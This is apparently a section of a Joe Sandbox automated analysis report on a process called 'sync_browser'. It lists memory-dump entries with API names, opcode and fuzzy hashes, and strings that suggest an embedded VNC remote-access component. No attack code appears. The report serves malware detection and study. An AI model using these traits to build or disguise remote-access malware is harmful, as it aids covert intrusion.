                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _amsg_exit$_getptd_lockfree
                                                                                          • String ID:
                                                                                          • API String ID: 2148533958-0
                                                                                          • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                                          • Instruction ID: bb15a097f8174aea0ec10ac34925a1f443bab4816093aef03007847f72012f1f
                                                                                          • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                                          • Instruction Fuzzy Hash: E8114C27A3964182EA949B10D4407B9B264FB64740F080235FE4D877A6DF2CE459C741
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                                          • String ID:
                                                                                          • API String ID: 540623443-0
                                                                                          • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                                          • Instruction ID: 29f7e4ef42b12bccb7261e2d55e4dfe58ac296a7e35b508627d2f9bdd0c16bb5
                                                                                          • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                                          • Instruction Fuzzy Hash: 5D113C23A38A4286EB80CF65D9446A8A3A4FB68B84F405431EA4E86614DF3DD599C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _amsg_exit_getptd$_lock
                                                                                          • String ID:
                                                                                          • API String ID: 3670291111-0
                                                                                          • Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                                          • Instruction ID: ae7cc578fb19191e4ef5b59c50e1c2bc67021079dd7b5ca2338a5f5813d5c82b
                                                                                          • Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                                          • Instruction Fuzzy Hash: D8F0F422E3A04686FA55AB61D841BB99A60EF64B00F480276FE0CDB3D2DE1CA848D711
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Escape$Release
                                                                                          • String ID:
                                                                                          • API String ID: 2350829361-0
                                                                                          • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                                          • Instruction ID: 8eea6ffad894448d54cc1bbd4ba64f8526fded096ffc7f3b4e839f106dbd8502
                                                                                          • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                                          • Instruction Fuzzy Hash: FFF06D32A2864187EB208B24B955A2AB2A9FB98788F544135EE4A42E24CE3CD015CB04
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: recvsend
                                                                                          • String ID: Enter SOCKS5 password for %s@%s:
                                                                                          • API String ID: 740075404-2439350543
                                                                                          • Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                                          • Instruction ID: 1419ac57f37a4c788e60922b603098612a89690fc7a22a3eb5e5763b2b925645
                                                                                          • Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                                          • Instruction Fuzzy Hash: 0551D4A3718A8144E7308B79A4403B96A94FB59BA8F544735FF6D83BE5DE2CD509C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: htonl
                                                                                          • String ID: .$.
                                                                                          • API String ID: 2009864989-3769392785
                                                                                          • Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                                          • Instruction ID: 606474dda36f2dd4195c02bd379f0b5960f0b0e44cc2a03b11a88a23032aa986
                                                                                          • Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                                          • Instruction Fuzzy Hash: AE41E153B2C68209F7219A36E85017DBADC5F66794F186631FE6AC62E6CE3CD449C301
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
                                                                                          • String ID: !UVNCDIR-
                                                                                          • API String ID: 2642416944-2720985186
                                                                                          • Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                                          • Instruction ID: d55b0a917b4f46f7c721e0d978d0d6419ab4ee203bfbaf132290ac804c3adbd1
                                                                                          • Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                                          • Instruction Fuzzy Hash: C741A36262CBC185EB268B24E4143FAA791FBA5780F448131EA9E877C6DF3CD60DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                          • String ID: B
                                                                                          • API String ID: 2959964966-1255198513
                                                                                          • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                                          • Instruction ID: cf7bf694e34f30cb2a1c27f582a56a1846f5762fb3de791f749e645436702905
                                                                                          • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                                          • Instruction Fuzzy Hash: D8314233B2462189E7119FB9A4404AD7774BB187A8F554136FE1DA3B88DF3DD449C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryFileModuleName
                                                                                          • String ID: " -service
                                                                                          • API String ID: 3981628254-877726483
                                                                                          • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                                          • Instruction ID: 66e392a7486730e0241a4e1eee4f14de1b587c5c952814ad11494f0603be7d7a
                                                                                          • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                                          • Instruction Fuzzy Hash: 3231F526A28AC094E720CB20F8043B9B7A1FFA8351F404332E6AC836D5DE3CE118C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleNamePlaySound
                                                                                          • String ID: ding_dong.wav
                                                                                          • API String ID: 3032721342-215479118
                                                                                          • Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                                          • Instruction ID: 81b47c4495f9cf45d06de029da0a6320b0b002beb3eaf7a2b5a98db05a6c5bd5
                                                                                          • Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                                          • Instruction Fuzzy Hash: E5113326B28A4592E7248B35F85536AA2A1FF58760F405336FA7DC76D4DF3CD114C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: getpeernameinet_ntoa
                                                                                          • String ID: <unavailable>
                                                                                          • API String ID: 1982201544-1096956887
                                                                                          • Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                                          • Instruction ID: fa50ef86830ad0a465db787d1a58f89ae2fe1af6c13d18e527a9ed6833fab154
                                                                                          • Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                                          • Instruction Fuzzy Hash: 120192A3B2564582EF50DB14E49537973A0FB98B89F440031FA4E8B364DF3CD599CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$MappingOpenView
                                                                                          • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                                          • API String ID: 3439327939-3305976270
                                                                                          • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                                          • Instruction ID: 2ef2b43aa49773a9c8dabdc5691df814034117bde6ef43bcdb062af3abb6407c
                                                                                          • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                                          • Instruction Fuzzy Hash: CE018B33A19B8086E720CB64E44126AF3A8FB94BA0F484335E6AA42B98CF7CD454C740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalDeleteSection
                                                                                          • String ID: vncclient.cpp : update thread gone
                                                                                          • API String ID: 166494926-1446885542
                                                                                          • Opcode ID: c70ae5ceed6a0217bc1349a0c22f1c8759ae68593431d1ea9294dd4061f560c0
                                                                                          • Instruction ID: deb2eb46924bce010639dbc1935aaaaee0414d65c3adc755a0221a17c066180a
                                                                                          • Opcode Fuzzy Hash: c70ae5ceed6a0217bc1349a0c22f1c8759ae68593431d1ea9294dd4061f560c0
                                                                                          • Instruction Fuzzy Hash: D7018C36A28A8190E711DF14E9543B8B321FB54BA4F644231EA6D877E5EF3DE55EC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLastMapping
                                                                                          • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                                          • API String ID: 1790465270-3305976270
